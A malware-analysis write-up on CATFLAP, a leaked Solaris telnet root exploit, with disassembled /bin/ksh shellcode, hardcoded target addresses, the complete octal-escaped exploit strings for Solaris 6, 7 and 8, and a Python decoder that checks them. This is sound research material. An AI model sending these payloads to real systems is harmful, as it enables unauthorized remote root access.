stoicsurgeon

Equation Group Research

CATFLAP

CATFLAP is a Solaris exploit with x86 and SPARC CPU architecture support. It is a telnet exploit that, according to the README, gives remote root access:

### paste catflap output once you get telnet prompt
<ctrl><d>

### should get root prompt

`strings` output for the CATFLAP binaries:

catflap:
*******************************************************
Solaris/x86 port of Cat Flap Exploit
%s < -6 | -7 | -8 >
  -6            Configure for Solaris 2.6 target
  -7            Configure for Solaris 7 target
  -8            Configure for Solaris 8 target
*******************************************************

Usage: %s [-v] IP "command"

GCC: (GNU) 2.96 20000731 (Mandrake Linux 8.1 2.96-0.62mdk)

catflap_intel_v1:
usage: catflap <-8> -c cmd
  -8		Configure for Solaris 8 target
  -7		Configure for Solaris 7 target
  -c cmd	Specify command to run on target

GCC: (GNU) 2.96 20000731 (experimental)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.0)

catflap_intel_v2:
*******************************************************
Solaris/x86 port of Cat Flap Exploit
%s < -6 | -7 | -8 > 
  -6		Configure for Solaris 2.6 target
  -7		Configure for Solaris 7 target
  -8		Configure for Solaris 8 target
*******************************************************
GCC: (GNU) 2.96 20000731 (experimental)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.0)

catflap_sparc:
usage: catflap <-6 | -7 | -8 | -p | -9> -c cmd
  -6		Configure for Solaris 2.6 target (post patch 105665-02)
  -7		Configure for Solaris 7 target
  -8		Configure for Solaris 8 target (pre patch 111085-01)
  -p		Configure for Solaris 8 target (post patch 111085-01)
  -9		Configure for Solaris 9 target
  -c cmd	Specify command to run on target

GCC: (GNU) 2.96 20000731 (experimental)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.0)

If we reverse engineer the Intel v2 binary, we find the following shellcode:

33c0eb065f884706eb2de8f5ffffff9a7a514c1f2705c333d2588d7814525750ab92ab884208b03be8e2ffffff33c050b001e8d8ffffffe8dbffffff2f62696e2f6b7368

Disassembling in radare2:

[0x00000000]> pd
            0x00000000      33c0           xor eax, eax
        ,=< 0x00000002      eb06           jmp 0xa
        |   0x00000004      5f             pop edi
        |   0x00000005      884706         mov byte [edi + 6], al
       ,==< 0x00000008      eb2d           jmp 0x37
       |`-> 0x0000000a      e8f5ffffff     call 4
       |    0x0000000f      9a7a514c1f27.  lcall 0x27:0x1f4c517a
       |    0x00000016      c3             ret
       |    0x00000017      33d2           xor edx, edx
       |    0x00000019      58             pop eax
       |    0x0000001a      8d7814         lea edi, [eax + 0x14]       ; "'" ; 20
       |    0x0000001d      52             push edx
       |    0x0000001e      57             push edi
       |    0x0000001f      50             push eax
       |    0x00000020      ab             stosd dword es:[edi], eax
       |    0x00000021      92             xchg eax, edx
       |    0x00000022      ab             stosd dword es:[edi], eax
       |    0x00000023      884208         mov byte [edx + 8], al
       |    0x00000026      b03b           mov al, 0x3b                ; ';' ; 59
       |    0x00000028      e8e2ffffff     call 0xf
       |    0x0000002d      33c0           xor eax, eax
       |    0x0000002f      50             push eax
       |    0x00000030      b001           mov al, 1
       |    0x00000032      e8d8ffffff     call 0xf
       `--> 0x00000037      e8dbffffff     call 0x17
            0x0000003c      /bin/ksh
            0x00000044

This code puts a null byte at 0x44 and then calls 0xf, but I wasn't able to figure out what that one would do or where it would jump to.

The hardcoded addresses at the beginning of the main function are probably locations in the telnet binary to jump to.

|           0x080486dc      c785a8d8ffff.  mov dword [local_2758h], 0x804fc6f ; version 6
|           0x080486e6      c785a4d8ffff.  mov dword [local_275ch], 0x804fcb7 ; version 7
|           0x080486f0      c785a0d8ffff.  mov dword [local_2760h], 0x8066b4f ; version 8

They are referenced and output in the final telnet exploit string (the non-printable bytes are encoded as octal escapes):

$ ./my_catflap -8
x x x x x x x x x x x x x x x x x x x x \
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=x\117\153\6\10\
xxx\144\153\6\10xxxx\144\153\6\10\
\63\300\353\6\137\210\107\6\353\55\350\365\377\377\377\232\172\121\114\37\47\5\303\63\322\130\215\170\24\122\127\120\253\222\253\210\102\10\260\73\350\342\377\377\377\63\300\120\260\1\350\330\377\377\377\350\333\377\377\377\57\142\151\156\57\153\163\150\
$ ./my_catflap -7
x x x x x x x x x x x x x x x x x x x x \
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=x\267\374\4\10\
xxx\304\374\4\10xxxx\304\374\4\10\
\63\300\353\6\137\210\107\6\353\55\350\365\377\377\377\232\172\121\114\37\47\5\303\63\322\130\215\170\24\122\127\120\253\222\253\210\102\10\260\73\350\342\377\377\377\63\300\120\260\1\350\330\377\377\377\350\333\377\377\377\57\142\151\156\57\153\163\150\
$ ./my_catflap -6
x x x x x x x x x x x x x x x x x x x x \
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=x\157\374\4\10\
xxx\204\374\4\10xxxx\204\374\4\10\
\63\300\353\6\137\210\107\6\353\55\350\365\377\377\377\232\172\121\114\37\47\5\303\63\322\130\215\170\24\122\127\120\253\222\253\210\102\10\260\73\350\342\377\377\377\63\300\120\260\1\350\330\377\377\377\350\333\377\377\377\57\142\151\156\57\153\163\150\
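To check that the octal-escaped output really carries the addresses from `main()` and the shellcode recovered from the Intel v2 binary, the following added example (not part of the original analysis, and not the tool's own code) decodes the tail of the `-8` output quoted above and matches the embedded pointer against the version table; the decoded raw bytes double as signature material. `decode_octal`, `text_pointers` and `identify_target` are names chosen here.

```python
import re
import struct
from typing import Optional

# Shellcode recovered from catflap_intel_v2 (the hex string from the analysis above).
SHELLCODE = bytes.fromhex(
    "33c0eb065f884706eb2de8f5ffffff9a7a514c1f2705c333d2588d7814525750"
    "ab92ab884208b03be8e2ffffff33c050b001e8d8ffffffe8dbffffff2f62696e2f6b7368"
)

# Per-target addresses hardcoded at the start of main() (from the radare2 listing above).
TARGET_ADDRS = {6: 0x0804FC6F, 7: 0x0804FCB7, 8: 0x08066B4F}

# Last three lines of the "./my_catflap -8" output quoted above, copied verbatim;
# the leading "x=xxxx" filler on the first line is cut since it carries no escapes.
TAIL_8 = r"""x=x\117\153\6\10\
xxx\144\153\6\10xxxx\144\153\6\10\
\63\300\353\6\137\210\107\6\353\55\350\365\377\377\377\232\172\121\114\37\47\5\303\63\322\130\215\170\24\122\127\120\253\222\253\210\102\10\260\73\350\342\377\377\377\63\300\120\260\1\350\330\377\377\377\350\333\377\377\377\57\142\151\156\57\153\163\150\
"""

# One token per match: a \NNN octal escape, a backslash-newline continuation, or a literal char.
_TOKEN = re.compile(r"\\([0-7]{1,3})|\\\n|(.)", re.S)


def decode_octal(text: str) -> bytes:
    """Expand C-style octal escapes to bytes; line continuations emit nothing."""
    out = bytearray()
    for m in _TOKEN.finditer(text):
        if m.group(1) is not None:
            out.append(int(m.group(1), 8))
        elif m.group(2) is not None:
            out.append(ord(m.group(2)))
    return bytes(out)


def text_pointers(data: bytes) -> list:
    """Every little-endian dword window that looks like a 0x080xxxxx text-segment address."""
    found = set()
    for i in range(len(data) - 3):
        v = struct.unpack_from("<I", data, i)[0]
        if v & 0xFFF00000 == 0x08000000:
            found.add(v)
    return sorted(found)


def identify_target(data: bytes) -> Optional[int]:
    """Solaris version the string was built for, judged by which hardcoded address it embeds."""
    for version, addr in TARGET_ADDRS.items():
        if struct.pack("<I", addr) in data:
            return version
    return None
```

The `-8` tail decodes to the version 8 address 0x08066b4f followed by a second nearby pointer and the shellcode bytes, which confirms the octal string and the `strings`/radare2 findings agree; the same decoder works on the `-7` and `-6` outputs.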